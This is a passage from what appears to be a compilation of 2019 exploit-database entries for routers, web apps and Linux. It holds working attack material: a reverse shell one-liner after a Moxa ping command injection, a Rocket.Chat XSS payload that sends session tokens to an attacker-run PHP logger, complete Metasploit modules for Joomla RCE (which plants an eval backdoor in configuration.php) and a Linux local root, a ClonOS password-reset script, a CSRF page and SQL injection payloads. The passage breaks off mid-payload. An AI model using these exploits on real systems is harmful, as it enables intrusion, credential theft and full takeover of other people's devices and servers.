to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user must have previously exported the log files. A CVSS v3 base score of 4.3 has been calculated. Exploitation CVE-2019-10969 - Ping Command Injection The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell that allows a subset of actions to be performed on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a crafted hostname, such as ($/bin/bash), in order to obtain a shell as shown below: Ping command injection Due to limitations on the CLI, it is not possible to use the shell as is. 
The attacker can use a reverse shell as shown below: bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1 CVE-2019-10963 - Missing Access Control On Log Files When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow: http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz An attacker can retrieve this archive without being authenticated on the Web interface as shown below: # wget http://192.168.0.1/MOXA_All_LOG.tar.gz --2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz Connexion à 192.168.0.1:80... connecté. requête HTTP transmise, en attente de la réponse... 200 OK Taille : 15724 (15K) [text/plain] Sauvegarde en : " MOXA_All_LOG.tar.gz " MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s 2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724] # tar ztvf MOXA_All_LOG.tar.gz drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/ -rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini -rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini -rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini Mitigation It is recommended to install at least the firmware version 5.3 from Moxa website. Timeline 2019-02-24: Vendor Disclosure 2019-02-24: Advisory sent to ICS-CERT 2019-09-30: Advisory published by Moxa 2019-10-01: Advisory published by ICS-CERT
  8. # Title: Rocket.Chat 2.1.0 - Cross-Site Scripting # Author: 3H34N # Date: 2019-10-22 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat < 2.1.0 # CVE: CVE-2019-17220 # Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) # PoC # 1. Create l33t.php on a web server <?php $output = fopen("logs.txt", "a+") or die("WTF? o.O"); $leet = $_GET['leet']."\n\n"; fwrite($output, $leet); fclose($output); ?> # 2. Open a chat session # 3. Send payload with your web server url ![title](http://10.10.1.5/l33t.php?leet=+`{}token`) # 4. Token will be written in logs.txt when target seen your message.
  9. # Title: IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path # Author: Sainadh Jamalpur # Date: 2019-10-22 # Vendor Homepage: https://www.iobit.com # Software Link: https://www.iobit.com/en/advanceduninstaller.php # Version : 9.1.0.8 # Tested on: Windows 10 64bit(EN) # CVE : N/A # 1. Description: # Unquoted service paths in IObit Uninstaller v9.1.0.8 have an unquoted service path. # PoC =========== C:\>sc qc IObitUnSvr [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IObitUnSvr TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IObit Uninstaller Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  # Exploit Title: Joomla! 3.4.6 - Remote Code Execution (Metasploit)
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo
# Vendor Homepage: https://www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated RCE against Joomla 3.0.0 - 3.4.6 (see 'Targets').
#
# What the visible code does: a serialized PHP object chain (built by
# get_payload / get_payload_backdoor) is submitted through the com_users login
# form as the `username` / `password` POST fields. The backdoor gadget appends
# an eval() of a randomly named POST parameter to configuration.php, and
# `exploit` then POSTs to /configuration.php to run the Metasploit payload.
#
# Operational / defensive notes grounded in this file:
#   - `check` is NOT passive: it calls check_by_exploiting, which sends the
#     object-injection payload (with a print_r marker) to the target.
#   - The persistent artifact is an appended block in configuration.php; file
#     integrity monitoring on that file detects the implant, and the author's
#     own description asks the operator to clean it up afterwards.
#   - Request shape seen by the web server: POST /index.php/component/users
#     with task=user.login whose username field is the literal text `\0`
#     repeated 27 times and whose password field starts with `AAA";`.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Joomla

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution',
      'Description' => %q{ PHP Object Injection because of a downsize in the read/write process with the database leads to RCE. The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter. That's because the exploit is more reliabale (doesn't rely on common disabled function). For this reason, use it with caution and remember the house cleaning. Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with get_payload('you_php_function','your_parameters'), e.g. 
get_payload('system','rm -rf /') and enjoy },
      'Author' => [
        'Alessandro \'kiks\' Groppo @Hacktive Security',
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'],
        ['URL', 'https://github.com/kiks7/rusty_joomla_rce']
      ],
      'Privileged' => false,
      'Platform' => 'PHP',
      'Arch' => ARCH_PHP,
      'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]],
      'DisclosureDate' => 'Oct 02 2019',
      'DefaultTarget' => 0)
    )
    register_advanced_options(
      [
        OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
      ])
  end

  # Return a random alphanumeric string of +length+ characters (default 50).
  # Used only to name the POST parameter the implanted backdoor reads; it is
  # built with Kernel#rand, which is fine for that purpose but is not a
  # cryptographic source.
  def get_random_string(length=50)
    source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a
    key=""
    length.times{ key += source[rand(source.size)].to_s }
    return key
  end

  # GET the site root and return the first `name=value` pair of the Set-Cookie
  # header (the Joomla session cookie). NOTE(review): if the response carries no
  # Set-Cookie header, `res.headers['Set-Cookie']` is nil and the split raises.
  def get_session_token
    # Get session token from cookies
    vprint_status('Getting Session Token')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    })
    cook = res.headers['Set-Cookie'].split(';')[0]
    vprint_status('Session cookie: ' + cook)
    return cook
  end

  # Load the com_users page with +sess_cookie+ and scrape the CSRF token name
  # from the last <input> of the first form (third whitespace-separated
  # attribute of its HTML, with `name="` and `"` stripped).
  # Returns the token string; prints an error and returns nil otherwise.
  # NOTE(review): if that attribute is absent, `split(' ')[2]` is nil and the
  # following `gsub` raises before the `if token` guard is reached, so the
  # print_error branch is effectively unreachable for that case.
  def get_csrf_token(sess_cookie)
    vprint_status('Getting CSRF Token')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
      'headers' => {
        'Cookie' => sess_cookie,
      }
    })
    html = res.get_html_document
    input_field = html.at('//form').xpath('//input')[-1]
    token = input_field.to_s.split(' ')[2]
    token = token.gsub('name="','').gsub('"','')
    if token then
      vprint_status('CSRF Token: ' + token)
      return token
    end
    print_error('Cannot get the CSRF Token ..')
  end

  # Fill the serialized-object template with a PHP callable and its argument.
  # +function+ is the PHP function name, +payload+ its single string argument;
  # the four placeholders (FUNC_NAME/FUNC_LEN/PAYLOAD/LENGTH) are replaced with
  # the values and their byte lengths so the PHP serialization stays valid.
  def get_payload(function, payload)
    # @function: The PHP Function
    # @payload: The payload for the call
    template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
    # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
    payload = 'http://l4m3rz.l337/;' + payload
    final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
    return final
  end

  # Same template as get_payload, but hard-wired to `assert` with a
  # file_put_contents(..., FILE_APPEND) argument that appends an eval() of the
  # POST parameter +param_name+ to configuration.php. Unlike get_payload, the
  # placeholders are replaced with String#[]= (first occurrence each), and no
  # `http://...;` prefix is prepended here — the `|| $a='http://wtf'` tail
  # serves that purpose instead.
  def get_payload_backdoor(param_name)
    # return the backdoor payload
    # or better, the payload that will inject and eval function in configuration.php (in the root)
    # As said in other part of the code. we cannot create new .php file because we cannot use
    # the ? character because of the check on URI schema
    function = 'assert'
    template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
    # This payload will append an eval() at the end of the configuration file
    payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
    template['PAYLOAD'] = payload
    template['LENGTH'] = payload.length.to_s
    template['FUNC_NAME'] = function
    template['FUNC_LEN'] = function.length.to_s
    return template
  end

  # Active vulnerability probe: submits a harmless print_r('IAMSODAMNVULNERABLE')
  # gadget through the login form and looks for the marker in the response or
  # in the page it redirects to.
  # Returns true/false when the login reply is a redirect, and nil (falsy)
  # when it is not — callers treat nil like "not vulnerable".
  def check_by_exploiting
    # Check that is vulnerable by exploiting it and try to inject a printr('something')
    # Get the Session and CSRF Tokens
    sess_token = get_session_token()
    csrf_token = get_csrf_token(sess_token)
    print_status('Testing with a POC object payload')
    username_payload = '\\0\\0\\0' * 9
    password_payload = 'AAA";' # close the prev object
    password_payload += get_payload('print_r','IAMSODAMNVULNERABLE') # actual payload
    password_payload += 's:6:"return":s:102:' # close cleanly the object
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
      'method' => 'POST',
      'headers' => {
        'Cookie' => sess_token,
      },
      'vars_post' => {
        'username' => username_payload,
        'password' => password_payload,
        'option' => 'com_users',
        'task' => 'user.login',
        csrf_token => '1',
      }
    })
    # Redirect in order to retrieve the output
    if res.redirection then
      res_redirect = send_request_cgi({
        'method' => 'GET',
        'uri' => res.redirection.to_s,
        'headers' =>{
          'Cookie' => sess_token
        }
      })
      if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
        return true
      else
        return false
      end
    end
  end

  # Version fingerprint via /administrator/manifests/files/joomla.xml, then an
  # active probe (check_by_exploiting, tried twice) when the version is in
  # range or the XML could not be fetched.
  # NOTE(review): `version <= '3.4.6' and version >= '3.0.0'` is a plain String
  # comparison, not a version comparison — e.g. '3.10.0' sorts below '3.4.6'
  # and would be treated as in range. Gem::Version would be the safer compare.
  def check
    # Check if the target is UP and get the current version running by info leak
    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
    unless res
      print_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end
    # Parse XML to get the version
    if res.code == 200 then
      xml = res.get_xml_document
      version = xml.at('version').text
      print_status('Identified version ' + version)
      if version <= '3.4.6' and version >= '3.0.0' then
        if check_by_exploiting()
          return Exploit::CheckCode::Vulnerable
        else
          if check_by_exploiting() then # Try the POC 2 times.
            return Exploit::CheckCode::Vulnerable
          else
            return Exploit::CheckCode::Safe
          end
        end
      else
        return Exploit::CheckCode::Safe
      end
    else
      print_error('Cannot retrieve XML file for the Joomla Version. 
Try the POC in order to confirm if it\'s vulnerable')
      if check_by_exploiting() then
        return Exploit::CheckCode::Vulnerable
      else
        if check_by_exploiting() then
          return Exploit::CheckCode::Vulnerable
        else
          return Exploit::CheckCode::Safe
        end
      end
    end
  end

  # Entry point. Runs `check` (unless FORCE overrides a Safe result), implants
  # the configuration.php backdoor via the login form, verifies it with an
  # `echo 'PWNED';` round-trip, and finally POSTs the encoded Metasploit
  # payload to it. The `pwned` local below is assigned but never read.
  # The implant is not removed by this module (no cleanup handler is
  # registered); see the class-level note.
  def exploit
    if check == Exploit::CheckCode::Safe && !datastore['FORCE']
      print_error('Target is not vulnerable')
      return
    end
    pwned = false
    cmd_param_name = get_random_string(50)
    sess_token = get_session_token()
    csrf_token = get_csrf_token(sess_token)
    # In order to avoid problems with disabled functions
    # We are gonna append an eval() function at the end of the configuration.php file
    # This will not cause any problem to Joomla and is a good way to execute then PHP directly
    # cuz assert is toot annoying and with conditions that we have we cannot inject some characters
    # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
    # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.
    # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
    # Use the implanted backdoor to receive a nice little reverse shell with a PHP payload
    # Implant the backdoor
    vprint_status('Cooking the exploit ..')
    username_payload = '\\0\\0\\0' * 9
    password_payload = 'AAA";' # close the prev object
    password_payload += get_payload_backdoor(cmd_param_name) # actual payload
    password_payload += 's:6:"return":s:102:' # close cleanly the object
    print_status('Sending exploit ..')
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
      'method' => 'POST',
      'headers' => {
        'Cookie' => sess_token
      },
      'vars_post' => {
        'username' => username_payload,
        'password' => password_payload,
        'option' => 'com_users',
        'task' => 'user.login',
        csrf_token => '1'
      }
    })
    print_status('Triggering the exploit ..')
    if res.redirection then
      res_redirect = send_request_cgi({
        'method' => 'GET',
        'uri' => res.redirection.to_s,
        'headers' =>{
          'Cookie' => sess_token
        }
      })
    end
    # Ping the backdoor see if everything is ok :/
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'configuration.php'),
      'vars_post' => {
        cmd_param_name => 'echo \'PWNED\';'
      }
    })
    if res.to_s.include? 'PWNED' then
      print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')
      print_status('Now it\'s time to reverse shell')
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path,'configuration.php'),
        'vars_post' => {
          cmd_param_name => payload.encoded
        }
      })
    end
  end
end
  11. # Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection # Date: 2019-10-22 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Website: https://nitesculucian.github.io # Vendor Homepage: https://slicedinvoices.com/ # Software Link: https://wordpress.org/plugins/sliced-invoices/ # Version: 3.8.2 # Tested on: Ubuntu 18.04 / Wordpress 5.3 # 1. Description: # The Wordpress Sliced Invoices plugin with a version lower than 3.8.2 is affected # by an Authenticated SQL Injection vulnerability. # 2. Proof of Concept: # Authenticated SQL Injection: - Using a Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 - The response will be returned after 20 seconds, proving successful exploitation of the vulnerability. - Sqlmap can be used to further exploit the vulnerability.
  12. # Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control # Date: 2019-10-24 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.auo.com/zh-TW # Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e # Tested on: It is a proprietary device: https://solar.auo.com/en-global/Support_Download_Center/index # CVE: N/A # 1. Description: # An issue was discovered in AUO SunVeillance Monitoring System. # There is an incorrect access control vulnerability that can allow the attacker to # bypass the authentication mechanism and upload files to the server without any authentication. # 2. Proof of Concept: (1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without any authentication. As a guest role, the user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx. (2) Modify the value of parameter authority from 40 to 100. The upload button is then enabled. (3) Now you can upload a file successfully. (4) The uploaded file is stored on the server side. This means any user without authentication can upload files to the server. Thank you for your kind assistance. Luca
  13. # Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection # Date: 2019-10-24 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.auo.com/zh-TW # Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e # Tested on: It is a proprietary device: https://solar.auo.com/en-global/Support_Download_Center/index # CVE: N/A # 1. Description: # AUO SunVeillance Monitoring System, all versions prior to v1.1.9e, is vulnerable to SQL Injection. # The vulnerability allows the attacker to inject malicious SQL commands into the server, which allows # the attacker to read privileged data. # 2. Proof of Concept: (1) Access the sending mail page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication. There is a parameter, MailAdd, in mvc_send_mail.aspx. (2) Modify the value of parameter MailAdd with a single quotation mark. The error messages contain Oracle database information. (3) By using the sqlmap tool, the attacker can acquire the list of databases on the server side. cmd: sqlmap.py -u "https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=" -p MailAdd --dbs (4) Furthermore, there are a few SQL Injection vulnerabilities in other fields. picture_manage_mvc.aspx (parameter: plant_no) swapdl_mvc.aspx (parameter: plant_no) account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code) Thank you for your kind assistance. Luca
  ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation for CVE-2019-13272 (ptrace_link credential
# mishandling in kernel/ptrace.c, fixed in 5.1.17 — see 'References').
#
# Flow visible in this file: upload the generated payload executable, upload
# the helper (compiled on the target when live_compile? is true, otherwise a
# pre-built binary from exploit_data), run the helper with the payload path on
# its stdin, and register both files for cleanup on session close.
#
# Preconditions enforced by `check`: kernel >= 3 and < 5.1.17, `pkexec`
# present, x86_64 hardware, and an interactive (non-remote) logind session —
# the module itself notes it cannot be used over SSH.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
      'Description' => %q{ This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. 
},
      'License' => MSF_LICENSE,
      'Author' => [
        'Jann Horn', # Discovery and exploit
        'bcoles', # Metasploit module
        'timwr', # Metasploit module
      ],
      'References' => [
        ['CVE', '2019-13272'],
        ['EDB', '47133'],
        ['PACKETSTORM', '153663'],
        ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
        ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
      ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      'Platform' => [ 'linux' ],
      'Arch' => [ ARCH_X64 ],
      'Targets' => [[ 'Auto', {} ]],
      'DefaultOptions' => {
        'Payload' => 'linux/x64/meterpreter/reverse_tcp',
        'PrependFork' => true,
      },
      'DisclosureDate' => 'Jul 4 2019'))
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Version gate plus environment checks; returns CheckCode::Safe on the first
  # failed condition, CheckCode::Appears otherwise. The vulnerability itself is
  # not exercised here.
  # NOTE(review): the comment below lists the stable backports that carry the
  # fix (4.4.185, 4.9.185, 4.14.133, 4.19.58), but the code only rejects
  # kernels >= 5.1.17 or < 3 — a patched 4.x kernel is therefore still reported
  # as "Appears". Distribution kernels with a backported fix will produce a
  # false positive unless ForceExploit/manual verification is used.
  def check
    # Introduced in 4.10, but also backported
    # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
    release = kernel_release
    # Only the part before the first '-' is parsed (drops distro suffixes).
    v = Gem::Version.new release.split('-').first
    if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
      vprint_error "Kernel version #{release} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Kernel version #{release} appears to be vulnerable"
    unless command_exists? 'pkexec'
      vprint_error 'pkexec is not installed'
      return CheckCode::Safe
    end
    vprint_good 'pkexec is installed'
    arch = kernel_hardware
    unless arch.include? 'x86_64'
      vprint_error "System architecture #{arch} is not supported"
      return CheckCode::Safe
    end
    vprint_good "System architecture #{arch} is supported"
    # A Remote=yes logind session (e.g. SSH) has no Polkit agent to talk to.
    loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
    if loginctl_output =~ /Remote=yes/
      print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
      return CheckCode::Safe
    end
    CheckCode::Appears
  end

  # Entry point. Refuses to run on an already-root session and on hosts where
  # `check` did not return Appears, unless ForceExploit is set (in which case
  # the second condition only warns). WritableDir must be writable; both
  # dropped files get random dot-prefixed names there and are scheduled for
  # deletion via register_file_for_cleanup.
  # The helper is driven by piping the payload path into it on stdin —
  # presumably the helper reads that path and executes it as root once the
  # ptrace condition is won; the helper source is not in this file.
  def exploit
    if is_root? && !datastore['ForceExploit']
      fail_with Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.'
    end
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end
    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end
    payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
    upload_and_chmodx(payload_file, generate_payload_exe)
    register_file_for_cleanup(payload_file)
    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
    end
    register_file_for_cleanup(exploit_file)
    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo #{payload_file} | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end
  # Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control
# Date: 2019-10-19
# Exploit Author: İbrahim Hakan Şeker
# Vendor Homepage: https://clonos.tekroutine.com/
# Software Link: https://github.com/clonos/control-pane
# Version: 19.09
# Tested on: ClonOs
# CVE : 2019-18418
import requests
from bs4 import BeautifulSoup
import sys


def getUser(host: str) -> None:
    """Print every user row returned by the web UI's ``/users/`` page.

    POSTs ``mode=getJsonPage`` to ``<host>/json.php``. Note what the request
    does *not* carry: no session cookie and no credentials of any kind —
    that is the access-control gap this script demonstrates, and it is also
    the thing to look for in access logs (XMLHttpRequest POSTs to json.php
    with no session).

    Each ``<tr>`` of the response is printed with the children of its first
    ``<td>`` and the row's ``id`` attribute.
    """
    # Raw string of two characters, backslash + double quote; it is stripped
    # from the row id below. Presumably the id comes back as an escaped,
    # quoted value — verify against a real response.
    reg=r'\"'
    r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"})
    r1_source = BeautifulSoup(r1.content,"lxml")
    for k in r1_source.findAll("tr"):
        # Iterates the children of the first cell only. A <tr> with no <td>
        # raises IndexError here, and a row with no id attribute raises
        # AttributeError on the .replace() — neither case is guarded.
        for i in k.findAll("td")[0]:
            print(f"[+]User Found: {i} User id: {k.get('id').replace(reg,'')}")


def changePassword(host: str, user: str, password: str, id: str) -> None:
    """Submit a ``usersEdit`` form that sets a new password for ``user_id``.

    As in getUser, the request carries no session cookie. Success is reported
    purely on an HTTP 200 status; the response body is not inspected, so a
    200 with an error page would still print ``[+]OK``.

    NOTE(review): this posts to ``host`` itself, whereas getUser posts to
    ``host + "/json.php"`` — confirm which endpoint the UI actually expects
    before relying on the ``[+]OK`` result. ``id`` shadows the builtin.
    """
    data={
        "mode":"usersEdit",
        "path":"/users/",
        "hash":"",
        "db_path":"",
        "form_data[username]":f"{user}",
        "form_data[password]":f"{password}",
        "form_data[password1]":f"{password}",
        "form_data[first_name]":"",
        "form_data[last_name]":"",
        "form_data[actuser]":"on",
        # int() raises ValueError for a non-numeric id (argv is always str).
        "form_data[user_id]": int(id)
    }
    r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"})
    if r2.status_code==200:print("[+]OK")
    else:print("[-]Fail")


if __name__=="__main__":
    # Sub-command dispatch on argv[1]. The match is a substring test, so any
    # argument containing "getUser"/"changePassword" selects that branch;
    # too few positional arguments raise IndexError rather than print usage.
    if len(sys.argv)>1:
        if "getUser" in sys.argv[1]:getUser(sys.argv[2])
        elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
        else:print("Fail parameter")
    else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")
  16. Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Date: 2019-10-25 Exploit Author: Prof. Joas Antonio Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://en.intelbras.com.br/node/25896 Version: 1.0.18 Tested on: Windows CVE : N/A #################### # PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be <html> <body> <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST"> <input type="hidden" name="GO" value="system_password.asp"> <input type="hidden" name="SYSPSC" value="0"> <input class="text" type="password" name="SYSOPS" value="hack123"/> <input class="text" type="password" name="SYSPS" value="mrrobot"/> <input class="text" type="password" name="SYSPS2" value="mrrobot"/> </form> <script> document.forms[0].submit(); </script> </body> </html>
  17. Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection Date: 2019-10-28 Exploit Author: Cakes Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git Version: 1.21 Tested on: CentOS7 CVE : N/A # PoC: Multiple SQL Injection vulnerabilities Parameter: start (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 0x323031392d30312d32332030303a30303a3030 ELSE 0x28 END)) AND 'ScZt'='ScZt&end=2019-01-24 00:00:00 Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6693 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6693=6693,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oFHi'='oFHi&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY 